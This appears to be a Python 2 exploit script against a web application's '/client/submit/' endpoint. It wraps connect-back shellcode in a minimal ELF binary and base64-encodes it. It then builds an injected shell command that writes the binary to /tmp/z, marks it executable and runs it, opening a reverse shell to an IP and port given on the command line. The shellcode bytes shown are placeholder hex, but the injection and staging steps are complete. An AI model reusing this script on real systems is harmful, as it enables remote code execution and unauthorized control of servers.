#!/usr/bin/python import sys import socket import struct import urllib from base64 import b64encode # Simple helper routines to pack/unpack 32bit numbers to/from binary def u32h(v): return struct.pack("<L", v).encode('hex') # x86/Linux TCP connectback shellcode (in hex) # this payload contains 2 placeholders: # * BAAD (will be replaced with IP address) # * 8BAD (will be replaced with port number) cback = "DEADBEEF" + "FEE1DEAD" + "BADDCAFE" + "BAADF00D" + "8BADF00D" # replace placeholder values in shellcode hex with the specified values cback = cback.replace("BAAD", socket.inet_aton(sys.argv[1]).encode("hex")) cback = cback.replace("8BAD", struct.pack(">H", int(sys.argv[2])).encode("hex")) # Tiny ELF stub based on: # http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html def make_elf(sc): elf_head = \ "7f454c46010101000000000000000000" + \ "02000300010000005480040834000000" + \ "00000000000000003400200001000000" + \ "00000000010000000000000000800408" + \ "00800408" + u32h(0x54+len(sc))*2 + \ "0500000000100000" return elf_head.decode("hex") + sc # print usage if not enough arguments are supplied if len(sys.argv) != 4: print 'usage: %s <connectback_ip> <connectback_port> <netmon_url>' exit(0) # invoke the make_elf helper to build an ELF file out of the shellcode elf = make_elf(cback.decode("hex")) # base64 encode the ELF file elf_b64 = b64encode(elf) # create a unix command that: uses the echo(1) and base(64) commands to write the # ELF file to the disk. Make elf file executable and run it (and fork to the background) cmd = "\necho " + elf_b64 + " | base64 -d > /tmp/z ; chmod +x /tmp/z ; /tmp/z &\n" # Properly format the url for the vulnerable script with an url-escaped version of the payload. print sys.argv[3] + '/client/submit/' + urllib.quote_plus(cmd)